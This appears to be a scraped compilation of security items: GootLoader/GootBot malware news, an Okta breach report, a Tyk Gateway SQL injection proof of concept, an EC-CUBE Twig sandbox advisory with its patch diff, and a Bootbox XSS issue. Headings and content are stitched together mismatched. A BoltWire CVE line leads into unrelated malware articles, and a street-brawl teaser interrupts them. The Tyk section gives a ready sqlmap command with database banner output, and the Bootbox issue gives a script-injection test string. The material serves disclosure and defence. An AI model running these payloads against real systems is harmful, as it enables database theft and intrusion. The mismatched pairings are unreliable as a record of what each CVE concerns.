An issue in BoltWire v.6.03 allows a remote attacker to obtain sensitive information via a crafted payload to the view and change admin password function.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-46501: report/boltwire/v6.03/boltwire_improper_access_control at main · Cyber-Wo0dy/report

A new variant of the GootLoader malware called GootBot has been found to facilitate lateral movement on compromised systems and evade detection.
"The GootLoader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 such as CobaltStrike or RDP," IBM X-Force researchers Golo Mühr and Ole

Endpoint Security / Malware

A new variant of the GootLoader malware called GootBot has been found to facilitate lateral movement on compromised systems and evade detection.

"The GootLoader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 such as CobaltStrike or RDP," IBM X-Force researchers Golo Mühr and Ole Villadsen said.

"This new variant is a lightweight but effective malware allowing attackers to rapidly spread throughout the network and deploy further payloads."

GootLoader, as the name implies, is a malware capable of downloading next-stage malware after luring potential victims using search engine optimization (SEO) poisoning tactics. It's linked to a threat actor tracked as Hive0127 (aka UNC2565).

The use of GootBot points to a tactical shift, with the implant downloaded as a payload after a Gootloader infection in lieu of post-exploitation frameworks such as CobaltStrike."

Described as an obfuscated PowerShell script, GootBot is designed to connect to a compromised WordPress site for command and control and receive further commands.

Complicating matters further is the use of a unique hard-coded C2 server for each deposited GootBot sample, making it difficult to block malicious traffic.

"Currently observed campaigns leverage SEO-poisoned searches for themes such as contracts, legal forms, or other business-related documents, directing victims to compromised sites designed to look like legitimate forums where they are tricked into downloading the initial payload as an archive file," the researchers said.

The archive file incorporates an obfuscated JavaScript file, which, upon execution, fetches another JavaScript file that's triggered via a scheduled task to achieve persistence.

In the second stage, JavaScript is engineered to run a PowerShell script for gathering system information and exfiltrating it to a remote server, which, in turn, responds with a PowerShell script that's run in an infinite loop and grants the threat actor to distribute various payloads.

This includes GootBot, which beacons out to its C2 server every 60 seconds to fetch PowerShell tasks for execution and transmit the results of the execution back to the server in the form of HTTP POST requests.

Some of the other capabilities of GootBot range from reconnaissance to carrying out lateral movement across the environment, effectively expanding the scale of the attack.

"The discovery of the Gootbot variant highlights the lengths to which attackers will go to evade detection and operate in stealth," the researchers said. "This shift in TTPs and tooling heightens the risk of successful post-exploitation stages, such as GootLoader-linked ransomware affiliate activity."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New GootLoader Malware Variant Evades Detection and Spreads Rapidly

By Deeba Ahmed
GootBot: New Gootloader Variant Evades Detection with Stealthy Lateral Movement.
This is a post from HackRead.com Read the original post: IBM X-Force Discovers Gootloader Malware Variant- GootBot

The original Gootloader malware was used by numerous threat groups, including ransomware affiliates and in additional payloads like SystemBC and IcedID.

IBM X-Force has discovered a new variant of the notorious **Gootloader malware**, dubbed GootBot. This malware performs stealthy lateral movement, which complicates the detection or blocking of the campaign within enterprise networks.

According to the **blog post** authored by Golo Mühr and Ole Villadsen, the Gootloader group implements their custom bot in the latter stages of this attack chain to evade detection, using off-the-shelf tools for establishing C2 communication, such as RDP or CobaltStrike.

Gootloader malware was initially used only as an initial access tool and evolved considerably over time to include GootBot, a lightweight obfuscated PS script. It is downloaded after the Gootloader infection and receives commands via C2 through encrypted PowerShell scripts.

For your information, the Gootloader group (aka UNC2565 or Hive0127) first surfaced in 2014 and focused more on SEO poisoning techniques and compromised WordPress websites to distribute the Gootkit-based Gootloader malware. Tanium’s director of endpoint security research, Melissa Bischoping, explained how **SEO poisoning** works. 

One of the hacked websites used in delivered Gootloader malware (Image: Sophos)

“SEO poisoning drives users to malicious payloads by manipulating the search results for key terms. Most security awareness training focuses heavily on phishing and other methods where an attacker sends something to the user. There’s a false sense of security that people place in search result top rankings and an outdated mindset that the lock on the address bar means a site is safe.”

Hackread.com has been following the Gootloader group’s activities since its emergence. The group frequently targets business-related online searchers like queries about legal contracts, creating legit-looking websites, and positioning them on the first page of search results. Once the user visits the page, they entice them into downloading archive files, which appear harmless and relevant to their queries but actually contain Gootloader malware.

In March 2021, Sophos cybersecurity firm **confirmed** that Gootloader has evolved into a sophisticated loader framework from serving as an initial access point, revealing that its delivery method had expanded beyond the Gootkit malware family. As an initial access point, Gootloader malware was used by numerous threat groups, including ransomware affiliates and in additional payloads like SystemBC and IcedID.  

GootBot is a novel Gootloader variant. It is a PowerShell payload encapsulating a single C2 server address. Its strings use a replacement key to conduct mild obfuscation. The malware, just like Gootloader, sends a GET request to the C2 server, requesting PowerShell tasks, and gets a string comprising a Base64-encoded payload.

The last 8 digits of the code are the task’s name. It then decodes the payload and injects it into the script block before executing it. The payload runs asynchronously, maintaining a default beaconing interval of 60 seconds. When it receives a C2 task, the next loop iteration starts, and for completed jobs, the results are returned.

GootBot is designed for lateral movement within the network, noted X-Force researchers. Its C2 infrastructure can quickly generate numerous GootBot payloads for distribution, each having a unique C2 address, and can cause multiple infections of the same host. It also runs a reconnaissance script and contains a unique GootBot ID for the host.

This effective malware lets attackers swiftly propagate across the compromised network to deploy additional malicious software. Unlike Gootloader, GootBot spreads through infected domains to reach the domain controller. This indicates a shift in attack tactics from Gootloader operators and enhances the success rate of post-exploitation stages, including Gootloader-based ransomware affiliate activity.

The malware is capable of extracting domain user name, and OS details from the registry key, checks for x86 dir and int ptr size if 64bit architecture is detected, and obtains information about domain controllers from registry and ENV var, SID, local IP address, hostname, and running processes. The data gets formatted with the specified ID.

The emergence of the GootBot variant highlights that attackers are employing sophisticated methods to stay undetected and spread laterally across the network. Lateral-movement scripts are possible through various techniques, such as WinRM, SMB, and WinAPI calls, to spread the payload to other hosts.

Infection diagram

Organizations must implement advanced security mechanisms, including endpoint detection and response (EDR) solutions and regularly updating software to prevent the threat. Bugcrowd cybersecurity firm’s founder and chief strategy officer, **Casey Ellis**, shared the following statement with Hackread.com regarding the current Gootloader campaign.

“This all strikes me as a very organized and thoughtful initial access broker (IAB). Their watering-hole style deployment of malicious SEO isn’t particularly targeted, however, it suits the opportunistic attack model of an IAB quite well. For defenders, it’s important to remember that organized cybercrime is continuing to evolve, stratify, and mature and that the threat actor behaviours now include this type of long, wide game.”

Keeper Security’s CEO and co-founder, **Darren Guccione**, in an exclusive statement shared with Hackread.com, noted that it is hard for innocent users to distinguish between authentic and fabricated search results, which makes SEO poisoning so successful.

“Innocent people who are not trained on SEO (Search Engine Optimization) and SEO-related attack vectors, including SEO poisoning, generally focus on the aesthetics of the search results page they are familiar with such as the domain name and the logos displayed. Often, threat actors will use language like “Official Website” to lure people into clicking a dangerous link or visiting a spoofed site that can download Gootloader or other malware onto their device.”

However, some scrutiny can prove beneficial in detecting malicious websites, said Guccione. “Phony or spoofed websites will usually have a different website address than the official company name and can also use different domain extensions than the one for the legitimate website. The majority of popular websites use the domain extension .com,” explained Guccione. 

“If you visit a site, pay special attention to the domain itself and if it appears to be abnormally long or unrecognizable based on your normal search activity, it’s best to ignore it – and not click on any link. Online tools such as a Google Transparency Report can also be used to determine whether a site is safe.”

1.  Google Algorithm Updates vs SEO Strategies
2.  How Can SEO Help Increase Website Security?
3.  Google Indexed Trove of Bard AI User Chats in Search Results
4.  Ad-blocker Chrome extension AllBlock injected ads in Google searches
5.  Malicious Chrome, Edge extensions manipulating Google search results

IBM X-Force Discovers Gootloader Malware Variant- GootBot

When a homeless man attacked a former city official, footage of the onslaught became a rallying cry. Then came another video, and another—and the story turned inside out.

What a Bloody San Francisco Street Brawl Tells Us About the Age of Citizen Surveillance

Okta has concluded that the root cause of its breach was an employee storing company credentials in a private Google account.

Okta has revealed details about a recent breach which exposed files belonging to customers.

As we explained in our article about 1Password being a victim of this breach, it’s normal for Okta support to ask customers to upload a file known as an HTTP Archive (HAR) file. Having this file allows the team to troubleshoot issues by replicating what’s going on in the browser. As such, a HAR file can contain sensitive data, including cookies and session tokens, that cybercriminals can use to impersonate valid users.

After 1Password, BeyondTrust, and Cloudflare detected unauthorized log-in attempts to their in-house Okta administrator accounts, they reported the incidents to Okta who started an investigation.

Okta says it found that from September 28 to October 17, 2023 an attacker had unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers.

The attacker gained access using stolen credentials of a service account stored in the system itself, which had permissions to view and update customer support cases.

To gain access to that service account, the attacker compromised an Okta employee. The employee logged into the service account while they were signed in to their personal Google profile in Chrome on their Okta-managed laptop. That meant that the credentials of the service account were stored in the employee’s personal Google account.

How they got from that account into the attacker’s hands is unknown, but likely the attacker compromised that personal account or one of the employee’s devices fell into the attacker’s hands, from where they could accessed the Google account and harvested the credentials.

Once in, the attacker was able to use session tokens in the HAR files to impersonate staff and hijack the legitimate Okta sessions of five customers, including 1Password, BeyondTrust, and Cloudflare.

Okta says it has now locked down personal Google access on company-managed computers:

> “Okta has implemented a specific configuration option within Chrome Enterprise that prevents sign-in to Chrome on their Okta-managed laptop using a personal Google profile.”

In general, it’s hard to strictly separate the use of devices for work purposes— in a 2020 survey by Malwarebytes, we found that the majority of people do use work devices for personal use. When a device gets assigned to an employee, they consider it more or less as “theirs” and there’s a tendency to start using it for personal matters. Okta could have anticipated this behavior and added additional security measures for such an important account.

A remediation task that is important to note for Okta customers is:

> “Okta has released session token binding based on network location as a product enhancement to combat the threat of session token theft against Okta administrators. Okta administrators are now forced to re-authenticate if we detect a network change. **This feature can be enabled by customers in the early access section of the Okta admin portal.**”

**Data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

 Okta breach happened after employee logged into personal Google account 

Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.

**Disclaimer**

For educational purpose only!

**Details**

Proof of concept for CVE-2023-42284. Tyk Gateway is vulnerable to SQL injection. Fixed in 5.0.7 version.

The URL parameter ‘api\_version’ of the "https://<YOUR\_URL>/api/errors/count/...?res=day&p=...&api\_version=<PAYLOAD\_HERE>&api\_id=..."is vulnerable to Blind SQL injection.

**Exploitation**

Use sqlmap with following parameters:

    python.exe .\sqlmap.py -u "https://<INSERT YOUR URL>/api/errors/count/11/8/2022/13/1/2022?res=day&p=-1&api_version=Non%20Versioned&api_id=<INSERT YOUR API_ID>" -p "api_version" --cookie="<INSERT COOKIE HERE> --banner
    

SQL DB banner is returned in response:

    ...
    banner: Postgresql 13.01 on x86_64-pc-linux-gnu
    ...

CVE-2023-42284: GitHub - andreysanyuk/CVE-2023-42284: Proof of concept for CVE-2023-42284 in Tyk Gateway

EC-CUBE 3 series (3.0.0 to 3.0.18-p6) and 4 series (4.0.0 to 4.0.6-p3, 4.1.0 to 4.1.2-p2, and 4.2.0 to 4.2.2) contain an arbitrary code execution vulnerability due to improper settings of the template engine Twig included in the product. As a result, arbitrary code may be executed on the server where the product is running by a user with an administrative privilege.

**更新履歴**

2023/11/09 15:00

目次の追加

2023/11/07 14:00

JVNからの公表内容情報へのリンクを追加

2023/10/26 13:00

初版公開

**目次**

*   EC-CUBEにおけるRCE可能な脆弱性
*   脆弱性の概要
*   Twigの更新手順
*   修正方法1: 修正ファイルを利用する場合(4.0系)
*   修正方法2: 修正差分を確認して適宜反映する場合(4.0系)
*   問い合わせ先
*   謝辞

**EC-CUBEにおけるRCE可能な脆弱性**

EC-CUBE 4.0系におけるRCE可能な脆弱性(危険度: 低)があることが判明いたしました。

脆弱性そのものは、修正の反映によりすぐに解決するものです。  
以下のいずれかの方法により、ご対応をお願いいたします。

*   修正ファイルを適用する
*   修正差分を確認して適用する

皆様にはお手数おかけし誠に申し訳ございません。  
本脆弱性における被害報告は現時点でございませんが、できるだけ速やかにご対応をお願いいたします。

**脆弱性の概要****EC-CUBEにおけるRCE可能な脆弱性****危険度:**

低

**不具合が存在するEC-CUBEのバージョン:**

*   **4.0.0〜4.0.6-p3**

**詳細:**

該当バージョンのEC-CUBEにはRCE可能な脆弱性が存在します。EC-CUBEはテンプレートエンジンとしてTwigを利用していますが、EC-CUBEの一部画面でTwigに対する設定不備が存在し、攻撃者が対象のシステム上で任意のコードを実行できる可能性があります。

**JVNからの公表内容 (2023/11/07公開)**

JVN#29195731: EC-CUBE 3系および 4系において任意のコードを実行される脆弱性

*   EC-CUBE 3系および 4系において任意のコードを実行される脆弱性 CVE-2023-46845

**Twigの更新手順**

EC-CUBE4.0系で利用している場合、Twigの不具合によりSandBox機能が動作しません。  
修正方法を実施する前に、Twigのアップデートを行ってください。

Twigをアップデートするためには、composerを使用する方法とファイルを手動でアップデートする方法の2つがあります。  
以下のどちらかを実施してください。

*   **composerコマンドにて、Twigをアップデート:**
    
    以下のコマンドを実行し、Twigを新しいバージョンに更新してください。  
    $ composer update twig/twig  
    $ composer update twig/extensions
    
    また、以下のコマンドを実行し、Twigが更新されていることを確認してください。
    
    $ composer show twig/twig  
    ※以下のように表示されることを確認してください。  
    name : twig/twig  
    versions : \* v2.15.5
    
    $ composer show twig/extensions  
    ※以下のように表示されることを確認してください。  
    name : twig/extensions  
    versions : \* v1.5.4
    

*   **Twigのファイルを手動でアップデート:**
    
    Twigを手動でアップデートする時は、以下の手順に従ってください。
    
    twig/twigのファイルを以下のURLからダウンロードします。  
    https://github.com/twigphp/Twig/archive/refs/tags/v2.15.5.zip
    
    \[EC-CUBEの設置先\]/vendor/twig/twigディレクトリ内を削除してください。  
    ダウンロードしたZIPファイルを\[EC-CUBEの設置先\]/vendor/twig/twigディレクトリに展開してください。
    
    twig/extensionのファイルを以下のURLからダウンロードします。  
    https://github.com/twigphp/Twig-extensions/archive/refs/tags/v1.5.4.zip
    
    \[EC-CUBEの設置先\]/vendor/twig/extensionsディレクトリ内を削除してください。  
    ダウンロードしたZIPファイルを\[EC-CUBEの設置先\]/vendor/twig/extensionsディレクトリに展開してください。
    
    ファイルが正しく上書きされたことを確認してください。  
    また、EC-CUBEの動作を確認し、テンプレートが正しく表示されることを確認してください。
    

**修正方法1: 修正ファイルを利用する場合**(4.0系)****

**※本修正を実施する前に、Twigの更新を必ず行ってください。**

開発環境がある場合は、まず開発環境でお試しください。  
以下の手順に従って、修正ファイルの反映をお願いいたします。

1.  修正ファイルのダウンロード
    
    ご利用中のEC-CUBEのバージョンに該当する修正ファイルをダウンロードしてください。  
    ※EC-CUBEのバージョンはこちらの手順でご確認ください。  
    ※修正ファイルは各バージョンの最新版に対して作成しています。旧バージョンをご利用の場合は、「修正方法2」のご対応をお願いします。  
    ※対象のファイルに対して既にカスタマイズをしている場合は、「修正方法2」のご対応をお願いします。
    
    *   **修正ファイル(4.0.6-p3)** (SHA256:0bcbb847ea1aaf8443f49f30015066122ce27f253574dcc92cae4b5859a6646f)
    
    ダウンロードし、解凍していただきますと、以下の修正ファイルがあります。必ず該当するバージョンのファイルをご利用ください。
    
    **4.0.6-p3**
    *   app/config/eccube/packages/twig\_extensions.yaml
    *   src/Eccube/Resource/template/default/Product/detail.twig
    *   src/Eccube/Resource/template/default/default\_frame.twig
    *   src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php
    *   src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php
2.  EC-CUBEファイルのバックアップ
    
    あらかじめEC-CUBEファイル全体のバックアップを行ってください。  
    
3.  修正ファイルの反映
    
    以下のファイルを上書き更新してください。
    
    上書きするファイル
    
    **4.0.6-p3**
    
    *   app/config/eccube/packages/twig\_extensions.yaml
    *   src/Eccube/Resource/template/default/Product/detail.twig
    *   src/Eccube/Resource/template/default/default\_frame.twig
    *   src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php
    *   src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php
    
    下記にファイルが存在する場合は同様に上書きをお願いします
    
    *   app/template/default/Product/detail.twig
    *   app/template/default/default\_frame.twig
    
    また、snippet.twigに関してはプラグインで拡張する箇所となるため対応不要となります。
    
    ※デザインテンプレートの適用や、EC-CUBE本体のカスタマイズをしている場合、修正箇所の差分をご確認のうえ反映をお願いします。  
    ※開発環境がある場合は、開発環境での反映・動作確認を行った後に、本番環境への反映をおすすめします。
4.  キャッシュの削除
    
    EC-CUBE のキャッシュの削除が必要です。  
    EC-CUBE の管理画面にログインいただき、コンテンツ管理 -> キャッシュ管理 のページからキャッシュの削除をお願いいたします。
    
5.  動作確認
    
    フロント画面と管理画面（ログインが必要）それぞれにおいて、基本操作が正常に行えることをご確認ください。  
    

**修正方法2: 修正差分を確認して適宜反映する場合**(4.0系)****

**※本修正を実施する前に、Twigの更新を必ず行ってください。**

以下のコード差分情報を参照して頂き、必要な箇所に修正を反映してください。

本修正方法はEC-CUBE 4.0.6-p3のバージョンを例として提示しております。  
過去バージョンをご利用の場合は、下記修正対象ファイルの修正差分を参考にご対応お願いいたします。  

**修正差分**

1.  app/config/eccube/packages/twig\_extensions.yaml +143 \-0
2.  src/Eccube/Resource/template/default/Product/detail.twig +1 \-1
3.  src/Eccube/Resource/template/default/default\_frame.twig +1 \-1
4.  src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php +78 \-0
5.  src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php +47 \-0

@@ -8,3 +8,146 @@ services:

8

8

  #Twig\\Extensions\\DateExtension: ~

9

9

  Twig\\Extensions\\IntlExtension: ~

10

10

  #Twig\\Extensions\\TextExtension: ~

11

+  

12

+ eccube.twig\_sandbox.policy:

13

+ class: Twig\\Sandbox\\SecurityPolicy

14

+ arguments:

15

+ $allowedTags: "%eccube.twig\_sandbox.allowed\_tags%"

16

+ $allowedFilters: "%eccube.twig\_sandbox.allowed\_filters%"

17

+ $allowedFunctions: "%eccube.twig\_sandbox.allowed\_functions%"

18

+ $allowedMethods: "%eccube.twig\_sandbox.allowed\_methods%"

19

+ $allowedProperties: "%eccube.twig\_sandbox.allowed\_properties%"

20

+ eccube.twig\_sandbox.extension:

21

+ class: Twig\\Extension\\SandboxExtension

22

+ arguments:

23

+ \- '@eccube.twig\_sandbox.policy'

24

+ \- false

25

+ tags: \['twig.extension'\]

26

+ Eccube\\Twig\\Sandbox\\SecurityPolicyDecorator:

27

+ decorates: 'eccube.twig\_sandbox.policy'

28

+ parameters:

29

+ eccube.twig\_sandbox.allowed\_tags:

30

+ \- 'apply'

31

+ \- 'block'

32

+ \- 'deprecated'

33

+ \- 'embed'

34

+ \- 'extends'

35

+ \- 'flush'

36

+ \- 'for'

37

+ \- 'if'

38

+ \- 'set'

39

+ \- 'spaceless'

40

+ \- 'verbatim'

41

+ \- 'with'

42

+ \- 'form\_theme'

43

+ \- 'stopwatch'

44

+ \- 'trans'

45

+ \- 'trans\_default\_domain'

46

+ eccube.twig\_sandbox.allowed\_filters:

47

+ \- 'abs'

48

+ \- 'batch'

49

+ \- 'capitalize'

50

+ \- 'column'

51

+ \- 'convert\_encoding'

52

+ \- 'date'

53

+ \- 'date\_modify'

54

+ \- 'default'

55

+ \- 'escape'

56

+ \- 'first'

57

+ \- 'format'

58

+ \- 'join'

59

+ \- 'json\_encode'

60

+ \- 'keys'

61

+ \- 'last'

62

+ \- 'length'

63

+ \- 'lower'

64

+ \- 'merge'

65

+ \- 'nl2br'

66

+ \- 'number\_format'

67

+ \- 'replace'

68

+ \- 'reverse'

69

+ \- 'round'

70

+ \- 'slice'

71

+ \- 'spaceless'

72

+ \- 'split'

73

+ \- 'striptags'

74

+ \- 'title'

75

+ \- 'trim'

76

+ \- 'upper'

77

+ \- 'url\_encode'

78

+ \- 'abbr\_class'

79

+ \- 'abbr\_method'

80

+ \- 'file\_link'

81

+ \- 'format\_args'

82

+ \- 'format\_args\_as\_text'

83

+ \- 'humanize'

84

+ \- 'trans'

85

+ \- 'yaml\_dump'

86

+ \- 'yaml\_encode'

87

+ \- 'date\_day'

88

+ \- 'date\_day\_with\_weekday'

89

+ \- 'date\_format'

90

+ \- 'date\_min'

91

+ \- 'date\_sec'

92

+ \- 'doctrine\_pretty\_query'

93

+ \- 'doctrine\_replace\_query\_parameters'

94

+ \- 'e'

95

+ \- 'ellipsis'

96

+ \- 'file\_ext\_icon'

97

+ \- 'form\_encode\_currency'

98

+ \- 'format\_log\_message'

99

+ \- 'no\_image\_product'

100

+ \- 'price'

101

+ \- 'time\_ago'

102

+ \- 'doctrine\_minify\_query'

103

+ \- 'localizedcurrency'

104

+ \- 'localizeddate'

105

+ \- 'localizednumber'

106

+ \- 'transchoice'

107

+ eccube.twig\_sandbox.allowed\_functions:

108

+ \- 'cycle'

109

+ \- 'date'

110

+ \- 'max'

111

+ \- 'min'

112

+ \- 'random'

113

+ \- 'range'

114

+ \- 'absolute\_url'

115

+ \- 'asset'

116

+ \- 'asset\_version'

117

+ \- 'csrf\_token'

118

+ \- 'is\_granted'

119

+ \- 'logout\_path'

120

+ \- 'logout\_url'

121

+ \- 'path'

122

+ \- 'relative\_path'

123

+ \- 'url'

124

+ \- 'active\_menus'

125

+ \- 'class\_categories\_as\_json'

126

+ \- 'csrf\_token\_for\_anchor'

127

+ \- 'currency\_symbol'

128

+ \- 'get\_all\_carts'

129

+ \- 'get\_cart'

130

+ \- 'get\_carts\_total\_price'

131

+ \- 'get\_carts\_total\_quantity'

132

+ \- 'has\_errors'

133

+ \- 'is\_reduced\_tax\_rate'

134

+ \- 'product'

135

+ \- 'workflow\_can'

136

+ \- 'workflow\_has\_marked\_place'

137

+ \- 'workflow\_marked\_places'

138

+ \- 'workflow\_transitions'

139

+ \- 'device\_version'

140

+ \- 'full\_view\_url'

141

+ \- 'is\_android\_os'

142

+ \- 'is\_device'

143

+ \- 'is\_full\_view'

144

+ \- 'is\_ios'

145

+ \- 'is\_mobile'

146

+ \- 'is\_mobile\_view'

147

+ \- 'is\_not\_mobile\_view'

148

+ \- 'is\_tablet'

149

+ \- 'is\_tablet\_view'

150

+ eccube.twig\_sandbox.allowed\_methods:

151

+ 'Symfony\\Bridge\\Twig\\AppVariable': \[ 'getrequest' \]

152

+ 'Symfony\\Component\\HttpFoundation\\Request': \[ 'geturi' \]

153

+ eccube.twig\_sandbox.allowed\_properties: \[\]

@@ -375,7 +375,7 @@ file that was distributed with this source code.

375

375

  </div>

376

376

  {% if Product.freearea %}

377

377

  <div class="ec-productRole\_\_description">

378

\- {{ include(template\_from\_string(Product.freearea)) }}

378

+ {{ include(template\_from\_string(Product.freearea), sandboxed = true) }}

379

379

  </div>

380

380

  {% endif %}

381

381

  </div>

@@ -28,7 +28,7 @@ file that was distributed with this source code.

28

28

  <meta name="robots" content="{{ Page.meta\_robots }}">

29

29

  {% endif %}

30

30

  {% if Page.meta\_tags is not empty %}

31

\- {{ include(template\_from\_string(Page.meta\_tags)) }}

31

+ {{ include(template\_from\_string(Page.meta\_tags), sandboxed = true) }}

32

32

  {% endif %}

33

33

  <link rel="icon" href="{{ asset('assets/img/common/favicon.ico', 'user\_data') }}">

34

34

  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css" integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5zCYotlSAcp1+c8xmyTe9GYg1l9a69psu" crossorigin="anonymous">

@@ -0,0 +1,78 @@

1

+ <?php

2

+  

3

+ /\*

4

+ \* This file is part of EC-CUBE

5

+ \*

6

+ \* Copyright(c) EC-CUBE CO.,LTD. All Rights Reserved.

7

+ \*

8

+ \* http://www.ec-cube.co.jp/

9

+ \*

10

+ \* For the full copyright and license information, please view the LICENSE

11

+ \* file that was distributed with this source code.

12

+ \*/

13

+  

14

+ namespace Eccube\\Twig\\Extension;

15

+  

16

+ use Twig\\Environment;

17

+ use Twig\\Error\\LoaderError;

18

+ use Twig\\Extension\\AbstractExtension;

19

+ use Twig\\Extension\\SandboxExtension;

20

+ use Twig\\Sandbox\\SecurityError;

21

+ use Twig\\TwigFunction;

22

+  

23

+ /\*\*

24

+ \* \\vendor\\twig\\twig\\src\\Extension\\CoreExtension の拡張

25

+ \*/

26

+ class IgnoreTwigSandboxErrorExtension extends AbstractExtension

27

+ {

28

+ /\*\*

29

+ \* {@inheritdoc}

30

+ \*/

31

+ public function getFunctions(): array

32

+ {

33

+ return \[

34

+ new TwigFunction('include', \[$this, 'twig\_include'\], \['needs\_environment' => true, 'needs\_context' => true, 'is\_safe' => \['all'\]\]),

35

+ \];

36

+ }

37

+  

38

+ /\*\*

39

+ \* twig sandboxの例外を操作します

40

+ \* app\_env = devの場合、エラーを表示する

41

+ \* app\_env = prodの場合、エラーを表示しない

42

+ \*

43

+ \* @param Environment $env

44

+ \* @param $context

45

+ \* @param $template

46

+ \* @param $variables

47

+ \* @param $withContext

48

+ \* @param $ignoreMissing

49

+ \* @param $sandboxed

50

+ \*

51

+ \* @return string|void

52

+ \*

53

+ \* @throws LoaderError

54

+ \* @throws SecurityError

55

+ \*/

56

+ public function twig\_include(Environment $env, $context, $template, $variables = \[\], $withContext = true, $ignoreMissing = false, $sandboxed = false)

57

+ {

58

+ try {

59

+ return \\twig\_include($env, $context, $template, $variables, $withContext, $ignoreMissing, $sandboxed);

60

+ } catch (SecurityError $e) {

61

+  

62

+ // devではエラー画面が表示されるようにする

63

+ $appEnv = env('APP\_ENV');

64

+ if ($appEnv === 'dev') {

65

+ throw $e;

66

+ } else {

67

+ // ログ出力

68

+ log\_warning($e->getMessage(), \['exception' => $e\]);

69

+  

70

+ // 例外がスローされた場合、sandboxが効いた状態になってしまうため追加

71

+ $sandbox = $env->getExtension(SandboxExtension::class);

72

+ if (!$sandbox->isSandboxedGlobally()) {

73

+ $sandbox->disableSandbox();

74

+ }

75

+ }

76

+ }

77

+ }

78

+ }

@@ -0,0 +1,47 @@

1

+ <?php

2

+  

3

+ /\*

4

+ \* This file is part of EC-CUBE

5

+ \*

6

+ \* Copyright(c) EC-CUBE CO.,LTD. All Rights Reserved.

7

+ \*

8

+ \* http://www.ec-cube.co.jp/

9

+ \*

10

+ \* For the full copyright and license information, please view the LICENSE

11

+ \* file that was distributed with this source code.

12

+ \*/

13

+  

14

+ namespace Eccube\\Twig\\Sandbox;

15

+  

16

+ use Twig\\Sandbox\\SecurityPolicy as BasePolicy;

17

+ use Twig\\Sandbox\\SecurityPolicyInterface;

18

+  

19

+ class SecurityPolicyDecorator implements SecurityPolicyInterface {

20

+  

21

+ /\*\* @var BasePolicy \*/

22

+ private $securityPolicy;

23

+  

24

+ public function \_\_construct(BasePolicy $securityPolicy)

25

+ {

26

+ $this->securityPolicy = $securityPolicy;

27

+ }

28

+  

29

+ public function checkSecurity($tags, $filters, $functions)

30

+ {

31

+ $this->securityPolicy->checkSecurity($tags, $filters, $functions);

32

+ }

33

+  

34

+ public function checkMethodAllowed($obj, $method)

35

+ {

36

+ // \_\_toStringの場合はチェックをスキップする

37

+ if ($method === '\_\_toString') {

38

+ return;

39

+ }

40

+ $this->securityPolicy->checkMethodAllowed($obj, $method);

41

+ }

42

+  

43

+ public function checkPropertyAllowed($obj, $method)

44

+ {

45

+ $this->securityPolicy->checkPropertyAllowed($obj, $method);

46

+ }

47

+ }

**問い合わせ先**

本脆弱性に関するお問合せ：

EC-CUBE 運営チーム  
MAIL: support@ec-cube.net

**謝辞**

本脆弱性は、

*   株式会社エヌ・エフ・ラボラトリーズ 三浦 剛様

よりご報告いただきました。  
この場をお借りして、厚く御礼申し上げます。

CVE-2023-46845: EC-CUBE4系におけるRCE可能な脆弱性(JVN#29195731)

Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

JesseDahl opened this issue

May 24, 2018

· 34 comments

**Comments**

bootbox.confirm and alert use jquery's .html() (and other functions) that add content to html elements. These are a potential XSS security issue since jquery evaluates the content.

Here's a working example (scroll down to the bottom of the JS window for the example code, I just borrowed somebody's fiddle and modified)  
https://jsfiddle.net/93sk1zeh/2/

Pass in the following string to the text input field

<script>alert('HELLO WORLD')</script>

it should show 3 separate alert boxes (which verifies it can potentially be used for XSS attacks).

I think there's two options:

1.  Sanitize input before adding it to a DOM element using jquery, or build up the element in a safe manner (i'm not 100% sure the right way to do that just yet tbh)
2.  Mention in the documentation the potential danger of passing in user-submitted data as the first parameter to bootbox.confirm() and bootbox.alert(), or, if using an object instead of a string message, as the title property. This way it's clear the library user is responsible for sanitizing any input that might be used with bootbox.

I suppose I can see your point, although taking input from a user and then (safely) using it in a call to Bootbox as dialog content seems like something that's the responsibility of the developer, not this library.

